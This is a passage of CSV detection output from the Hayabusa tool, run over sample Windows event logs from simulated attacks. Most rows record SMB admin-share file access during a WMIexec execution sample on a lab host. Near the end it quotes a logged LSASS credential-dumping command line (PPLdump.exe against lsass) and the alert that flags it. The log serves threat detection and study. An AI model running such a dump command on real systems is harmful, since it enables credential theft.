Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 
0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v 
